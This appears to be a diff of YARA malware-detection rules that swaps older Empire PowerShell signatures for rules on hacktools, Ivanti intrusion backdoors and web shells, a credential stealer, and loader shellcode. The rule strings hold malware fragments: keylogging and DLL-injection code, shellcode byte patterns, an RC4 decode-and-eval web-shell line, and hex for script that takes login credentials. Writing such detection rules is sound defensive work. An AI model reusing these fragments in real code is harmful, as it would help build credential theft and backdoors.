+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_hacktool.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd87a5d3a710017953c8c19862e4daee25de0e57175cab8246eea6d067fcb4d1"
-		score = 75
+		logic_hash = "51c54026672e9ad36d2d68ae8dba61437f8808fbf2ad3c3c7bb086d8abb63987"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
+		hash1 = "2e7b4141e1872857904a0ef2d87535fd913cbdd9f964421f521b5a228a492a29"
 
 	strings:
-		$s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii
-		$s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii
+		$s2 = "InjectDLL" fullword ascii
+		$s4 = "Kernel32.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Empire_Get_Keystrokes : FILE
+rule SIGNATURE_BASE_HKTL_Python_Sectools
 {
 	meta:
-		description = "Detects Empire component - file Get-Keystrokes.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7fb57a0d-6b65-5ee8-96ef-9af303f15007"
-		date = "2016-11-05"
+		description = "Detects code which uses the python lib sectools"
+		author = "Arnim Rupp"
+		id = "89a5e0ba-5547-53e4-84a3-d07ee779596e"
+		date = "2023-01-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L307-L320"
+		reference = "https://github.com/p0dalirius/sectools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_hacktool.yar#L18-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "710e1bbf517c6683bd3082786e605cb8e6a52460f9c96609610e5ab38800dc79"
-		score = 75
+		hash = "814ba1aa62bbb7aba886edae0f4ac5370818de15ca22a52a6ab667b4e93abf84"
+		hash = "b3328ac397d311e6eb79f0a5b9da155c4d1987e0d67487ea681ea59d93641d9e"
+		hash = "8cd205d5380278cff6673520439057e78fb8bf3d2b1c3c9be8463e949e5be4a1"
+		logic_hash = "17f6897dc623f822c7ae6a7ae51714e78316d7b7fdf59b9f2f625ecaae939522"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
 
 	strings:
-		$s1 = "$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii
+		$import1 = "from sectools"
+		$import2 = "import sectools"
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+		any of ( $import* )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Dllinjection : FILE
+rule SIGNATURE_BASE_HKTL_EDR_Freeze_Sep25_2 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-DllInjection.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6aa14e8f-9801-5cd3-beb0-955e19d25503"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L322-L335"
+		description = "Detects EDR-Freeze hacktool"
+		author = "Florian Roth"
+		id = "1446a128-47ee-51a4-9d69-326dfd0d8267"
+		date = "2025-09-30"
+		modified = "2025-09-30"
+		reference = "https://github.com/TwoSevenOneT/EDR-Freeze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_edr_freeze_sep25.yar#L1-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "450ca96dd7c80275d7e4eaf07a7229e27530c373b8d79af5be8f4a741daef448"
-		score = 75
+		logic_hash = "735d56839f17ca98a0022e6044b8d0bc43201b48e3a64c7b671c417f62749643"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
+		hash1 = "193ca17f574fa5e23866560170425f83696f78e83dabd7e831dd7827a69283fd"
+		hash2 = "36a17919a97732f1ddc31b421c6ebb0c535924f895d7caaff04a5da908c42f76"
+		hash3 = "394b768bfd3506a9ee6b7bbe6f87c40fb23c28f7919a2a9eb333b27db635eafe"
+		hash4 = "a8ec07f006a9068ce5f068b3bb61b0649481b6b26203b8eb4308c53ff1d1bf8d"
+		hash5 = "d485017fb20c5a8fe38a6dbf896d4cbce485ff53a6cfe0e1440a1818b2d303ee"
+		hash6 = "d989ebd417e6fae60a544e43bfc0ee63f5d9352ce0059b95ed4e7e18efbc5d0b"
+		hash7 = "e2b2dd0984e52112965392471f6a09020eb8380aa53d48d2fb4dd3aaa7edae9b"
 
 	strings:
-		$s1 = "-Dll evil.dll" fullword ascii
+		$x1 = "EDR-Freeze.exe <TargetPID> <SleepTime>" wide fullword
+		$x2 = "Successfully created PPL process with PID:" wide fullword
+		$x3 = "\\EDR-Freeze.pdb" ascii
+		$sa1 = "C:\\Windows\\System32\\WerFaultSecure.exe" wide fullword
+		$sa2 = "Failed to create dump files: " wide fullword
+		$sb1 = " /encfile" wide fullword
+		$sb2 = " /pid" wide fullword
+		$sb3 = " /tid" wide fullword
+		$sb4 = " /cancel" wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 40KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) ) or 6 of them
 }
-rule SIGNATURE_BASE_Empire_Keepassconfig : FILE
+rule SIGNATURE_BASE_APT_UNC5221_Ivanti_Forensicartifacts_Jan24_1 : FILE
 {
 	meta:
-		description = "Detects Empire component - file KeePassConfig.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "814a6ff9-a6ac-55e7-bb3f-597351ce421d"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L337-L350"
+		description = "Detects forensic artifacts found in the Ivanti VPN exploitation campaign by APT UNC5221"
+		author = "Florian Roth"
+		id = "49ba2a96-379d-5a58-979d-45e83fa546e7"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "044c8a326ee6cc74a918e6c28100032bfd2fb396ddab8683ab11e00f9370ab2a"
+		logic_hash = "7f485f41072f5584dc76e71564e13066d9fe41685f33bff9c2886fa7d2155f94"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
 
 	strings:
-		$s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii
+		$x1 = "system(\"chmod a+x /home/etc/sql/dsserver/sessionserver.sh\");"
+		$x2 = "SSH-2.0-OpenSSH_0.3xx."
+		$x3 = "sed -i '/retval=$(exec $installer $@)/d' /pkg/do-install"
 
 	condition:
-		( uint16( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
+		filesize < 5MB and 1 of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Sshcommand : FILE
+rule SIGNATURE_BASE_M_Hunting_Backdoor_ZIPLINE_1 : FILE
 {
 	meta:
-		description = "Detects Empire component - file Invoke-SSHCommand.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b06b507f-b6b8-5f4b-8d6d-920f141e9ac1"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L352-L367"
+		description = "This rule detects unique strings in ZIPLINE, a passive ELF backdoor that waits for incoming TCP connections to receive commands from the threat actor."
+		author = "Mandiant"
+		id = "753884d6-d4c1-5e94-9d2c-f6ebb7bfaf85"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L18-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3749c3d58335cb08bff66fe3126fc4977261576a9fbedbd7da673e3921364850"
+		logic_hash = "41857ba465dd1f2e1aa8c1eed36b73606385eeedf233fd480bb8a4ef15499174"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
 
 	strings:
-		$s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
-		$s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii
-		$s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii
+		$s1 = "SSH-2.0-OpenSSH_0.3xx" ascii
+		$s2 = "$(exec $installer $@)" ascii
+		$t1 = "./installer/do-install" ascii
+		$t2 = "./installer/bom_files/" ascii
+		$t3 = "/tmp/data/root/etc/ld.so.preload" ascii
+		$t4 = "/tmp/data/root/home/etc/manifest/exclusion_list" ascii
 
 	condition:
-		( uint16( 0 ) == 0x660a and filesize < 2000KB and 1 of them ) or all of them
+		uint32( 0 ) == 0x464c457f and filesize < 5MB and ( ( 1 of ( $s* ) ) or ( 3 of ( $t* ) ) )
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen1 : FILE
+rule SIGNATURE_BASE_M_Hunting_Dropper_WIREFIRE_1 : FILE
 {
 	meta:
-		description = "Detects Empire component"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8fdb48a0-5d40-55be-ae23-e9c8c4c2ecea"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L371-L390"
+		description = "This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance."
+		author = "Mandiant"
+		id = "051244f0-00b1-5a4b-8c81-f4ce6f1aa22a"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L40-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "074423d30c5ef419d1ca9433477d8a896086cec84eb939270ce51d3965b6b1a2"
+		hash = "6de651357a15efd01db4e658249d4981"
+		logic_hash = "c389a666bd093cdd7700385da43c8fa58b9f3d899e658c516df0f3aca439401d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
-		hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
-		hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
-		$s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii
+		$s1 = "zlib.decompress(aes.decrypt(base64.b64decode(" ascii
+		$s2 = "aes.encrypt(t+('\\x00'*(16-len(t)%16))" ascii
+		$s3 = "Handles DELETE request to delete an existing visits data." ascii
+		$s4 = "request.data.decode().startswith('GIF'):" ascii
+		$s5 = "Utils.api_log_admin" ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Powerup_Gen : FILE
+rule SIGNATURE_BASE_M_Hunting_Webshell_LIGHTWIRE_2 : FILE
 {
 	meta:
-		description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ae6b0462-7193-54a4-8fb9-befc1b461b15"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L392-L407"
+		description = "Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner."
+		author = "Mandiant (modified by Florian Roth)"
+		id = "9451da63-c68e-51e8-b4b1-c3082d46fbf6"
+		date = "2024-01-11"
+		modified = "2024-01-12"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L60-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4086b057b46cac85bb871d2d4363d4ae4c99a160e5c9625e4d41e3df55fece2d"
+		hash = "3d97f55a03ceb4f71671aa2ecf5b24e9"
+		logic_hash = "37b22a6c45dd53bc7b3f0c75cc5072e990246fea24591d192176c0b496e92084"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
 
 	strings:
-		$s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii
-		$s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii
+		$s1 = "eval{my"
+		$s2 = "Crypt::RC4->new(\""
+		$s3 = "->RC4(decode_base64(CGI::param('"
+		$s4 = ";eval $"
+		$s5 = "\"Compatibility check: $@\";}"
 
 	condition:
-		( uint16( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen2 : FILE
+rule SIGNATURE_BASE_M_Hunting_Dropper_THINSPOOL_1 : FILE
 {
 	meta:
-		description = "Detects Empire component"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eab277ca-0dd4-5035-82aa-1ac2120bac94"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L409-L428"
+		description = "This rule detects THINSPOOL, a dropper that installs the LIGHTWIRE web shell onto a Pulse Secure system."
+		author = "Mandiant"
+		id = "dd340f72-0a2c-5b66-9e31-1c0f20cd842f"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L83-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e3cb63d0c3278ee4d04cb4b1d6ebe817fb3da97d25e2581f95bd43ecd5142b30"
+		hash = "677c1aa6e2503b56fe13e1568a814754"
+		logic_hash = "a8043822cd36a802ba6656c42085f09d67cedb0689c9da48438d788b320bd6c0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
-		hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
-		hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" fullword ascii
-		$s20 = "#Shellcode: CallDllMain.asm" fullword ascii
+		$s1 = "/tmp/qactg/" ascii
+		$s2 = "echo '/home/config/dscommands'" ascii
+		$s3 = "echo '/home/perl/DSLogConfig.pm'" ascii
+		$s4 = "ADM20447" ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Agent_Gen : FILE
+rule SIGNATURE_BASE_M_Hunting_Credtheft_WARPWIRE_1 : FILE
 {
 	meta:
-		description = "Detects Empire component - from files agent.ps1, agent.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0fac915c-2502-50da-93d1-f81e9282aa9a"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L430-L447"
+		description = "This rule detects WARPWIRE, a credential stealer written in JavaScript that is embedded into a legitimate Pulse Secure file."
+		author = "Mandiant"
+		id = "9a6a8783-b531-560d-998d-8aa7c90158a8"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L102-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed8aee7ac6c1d93b21cc1aa5c3c18df1566692c63a010715a3aae65e18fffa60"
+		hash = "d0c7a334a4d9dcd3c6335ae13bee59ea"
+		logic_hash = "8029df5998166ab3db3319b0dd765ef3356b4b44dc16d2d418015a0f7ffac97e"
 		score = 75
-		quality = 85
+		quality = 77
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
-		hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
 
 	strings:
-		$s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii
-		$s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii
-		$s3 = "if ($script:AgentDelay -ne 0){" fullword ascii
+		$s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}
+		$s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}
+		$s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}
+		$s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74}
+		$s5 = "Remember the last selected auth realm for 30 days" ascii
 
 	condition:
-		( uint16( 0 ) == 0x660a and filesize < 100KB and 1 of them ) or all of them
+		filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen3 : FILE
+rule SIGNATURE_BASE_MAL_Crime_Win32_Loader_Guloader_1_Experimental : FILE
 {
 	meta:
-		description = "Detects Empire component"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b0f7ed41-be65-5e43-aeb1-56e5e7384e8f"
-		date = "2016-11-05"
+		description = "Detects injected GuLoader shellcode bin"
+		author = "@VK_Intel"
+		id = "c37882c6-15dc-54dc-8c10-7e91ea0fc6bd"
+		date = "2020-05-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L449-L467"
+		reference = "https://twitter.com/VK_Intel/status/1257206565146370050"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_guloader.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "933fe27c54e90806a21082b4d2e4cbb3491374e48834a64c0d6a520c537d145e"
-		score = 75
+		logic_hash = "03b7e0251b1c08798ce310cc4c11adfaa3071409d608c91c30d5fc7e28a079de"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
-		hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+		tlp = "white"
 
 	strings:
-		$s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" fullword ascii
-		$s2 = "remote DLL injection" ascii
+		$djib2_hash = { f8 8b ?? ?? ?? ba 05 15 00 00 89 d3 39 c0 c1 e2 05 81 ff f6 62 f1 87 01 da 0f ?? ?? d9 d0 01 da 83 c6 02 66 ?? ?? ?? 75 ?? c2 04 00}
+		$nt_inject_loader = {8b ?? ?? ba 44 1a 0e 9e 39 d2 e8 ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? f8 ba d0 e0 8b 30 e8 ?? ?? ?? ?? d9 d0 89 ?? ?? d9 d0 81 fb 20 af 00 00 8b ?? ?? 39 c9 ba 92 a7 f3 95 e8 ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? 39 d2 ba d0 20 2e d0 e8 ?? ?? ?? ?? 89 ?? ?? f8 8b ?? ?? ba 6a 19 1f 23 d9 d0 e8 ?? ?? ?? ?? d9 d0 89 ?? ?? 81 fb e4 8c 00 00 39 c9 8b ?? ?? ba 19 50 9c c2 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 39 d2 8b ?? ?? fc ba 3d 13 8e 8b e8 ?? ?? ?? ?? d9 d0 89 ?? ?? f8 8b ?? ?? ba 30 3d 7b 2c e8 ?? ?? ?? ??}
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Inveighrelay_Gen : FILE
+rule SIGNATURE_BASE_Apolmy_Privesc_Trojan : FILE
 {
 	meta:
-		description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
+		description = "Apolmy Privilege Escalation Trojan used in APT Terracotta"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0adebf6f-99e1-5461-8efc-e4660faf6d5d"
-		date = "2016-11-05"
+		id = "2f3f496b-ebfe-5a6e-89ad-a24af6378fd7"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L469-L484"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L11-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "183a0afa9233e380471ddfa8f85e6c6555d69c785c9a4e8791e19432b6849558"
-		score = 75
+		hash = "d7bd289e6cee228eb46a1be1fcdc3a2bd5251bc1eafb59f8111756777d8f373d"
+		logic_hash = "8cce828806d5829735d6ac8d28a48c9b016b96b4370b2f3ac139799a9fe13c4a"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
 
 	strings:
-		$s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii
-		$s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii
+		$s1 = "[%d] Failed, %08X" fullword ascii
+		$s2 = "[%d] Offset can not fetched." fullword ascii
+		$s3 = "PowerShadow2011" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 200KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Keepassconfig_Gen : FILE
+rule SIGNATURE_BASE_Mithozhan_Trojan : FILE
 {
 	meta:
-		description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
+		description = "Mitozhan Trojan used in APT Terracotta"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e2bc88c5-50f8-5ddc-a449-41929b1d0528"
-		date = "2016-11-05"
+		id = "5e2b4e08-1a35-5eb0-8c25-a73d45b0e279"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L486-L500"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L29-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "986f299d2b6e2ec47acae09d8a25b6c45caf83c964208c594433308cd11ad264"
-		score = 75
+		hash = "8553b945e2d4b9f45c438797d6b5e73cfe2899af1f9fd87593af4fd7fb51794a"
+		logic_hash = "a7beb030368cc6e1119617991b68e6fa1bf2d1f6eee28e83fef7862313f19d30"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
 
 	strings:
-		$s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii
+		$s1 = "adbrowser" fullword wide
+		$s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" fullword ascii
